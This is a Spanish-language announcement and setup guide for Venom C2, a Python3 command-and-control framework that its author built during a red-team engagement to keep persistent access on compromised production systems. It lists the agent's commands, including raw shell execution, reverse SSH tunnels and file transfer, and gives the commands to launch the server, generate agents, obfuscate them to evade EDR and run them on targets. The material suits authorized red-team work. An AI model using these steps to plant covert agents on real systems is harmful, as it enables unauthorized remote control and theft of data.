
Venom C2 es un framework de Comando y Control en Python3 sin dependencias para la persistencia de equipos rojos.

Venom C2 es un framework de Comando y Control en Python3 sin dependencias para la persistencia del equipo rojo, diseñado para ejecutarse en sistemas sin instalar paquetes. Se compone de un servidor de equipo Flask, una GUI de operador Electron y un agente Python de un solo archivo que se comunica a través de HTTP/HTTPS utilizando mensajes JSON cifrados con AES configurables. Úselo para ejecutar comandos, administrar archivos, mantener acceso y crear túneles inversos SSH desde sistemas comprometidos.
Mientras escalábamos privilegios de red, aterrizamos en muchos sistemas de producción que ejecutaban distros y arquitecturas exóticas. Queríamos establecer persistencia, pero nuestro arsenal de herramientas y técnicas no funcionaba. Además, algunos de los sistemas objetivo estaban ejecutando EDR.
Estos eran sistemas de producción, así que no queríamos instalar paquetes. Necesitábamos un agente C2 que se ejecutara sin dependencias. Los sistemas tenían Python3 instalado, así que creé Venom C2 a mitad de un compromiso; un agente C2 de Python3 sin dependencias que simplemente funciona.
No queríamos usar agentes C2 comerciales debido al riesgo de que pudieran resultar en detección por parte del equipo azul. El código único es el rey para evadir los EDR modernos
Como había muchos sistemas, automatizamos la ofuscación única, los nombres, la ubicación en el sistema de archivos, diferentes dominios de callback de red y solicitudes de ruta de red únicas por agente.

Lo llamé Venom porque mi hijo ama al villano Venom de Spider-Man. Además, python es una serpiente y las serpientes geniales tienen veneno, así que parecía una buena combinación.
No hay ninguno.
Esto fue solo un proyecto C2 único que hice a mitad de un compromiso. Me tomó unos 2 días de desarrollo para que fuera estable y confiable en el entorno objetivo. Hizo su trabajo, nos dio persistencia en la red durante las 6 semanas restantes del compromiso. No tengo planes de continuar desarrollando o usando este proyecto, así que pensé que era un buen candidato para publicarlo públicamente.
De lo contrario, simplemente se perdería en el devNULL...


[11-04-2025 11:31 AM MST] admin help
help : Display this help menu
ls : List directory contents
pwd : Show current working directory
cd : Change directory
cat : Display file contents
mv : Move/rename files or directories
cp : Copy files or directories
mkdir : Create directory
rmdir : Remove empty directory
write : Write content to file
chmod : Change file permissions
rm : Remove (delete) files
shell : Execute raw shell command
sleep : Make agent sleep with optional jitter
sshrev : Create reverse SSH tunnel
kill : Terminate agent process
upload : Upload a file from your local operator box to the remote agent box
download : Download a file from remote agent box to local operator box
git clone https://github.com/boku7/venom
cd venom
pip3 install -r server/requirements.txt
cd server
python3 server.py --help
python3 server.py
python3 server.py --adduser <USUARIO> <CONTRASEÑA>Ejecuta la interfaz de usuario del cliente en tu estación de trabajo (no en el servidor). Debe poder alcanzar el servidor.
cd ../client
npm install
npm run start
Abre el cliente, ve a Configuración e ingresa las credenciales del servidor.
La ruta base de la API del cliente del servidor es /api/. No expongas /api/ a Internet público. Usa VPN o reglas estrictas de firewall/proxy inverso para que solo los clientes de confianza puedan acceder a ella.
Desde el directorio server:
python3 agent_create.py -H <host_del_servidor> -P <puerto_del_servidor> [-http]
Desde el directorio server:
python3 agent_obfuscate.py agents/<archivo_agente_generado>.py
Para ejecutarse en el equipo objetivo que deseas controlar.
python3 /Users/bobby/venom/server/obfuscate/output/obfuscated_agent_20251104_110902.py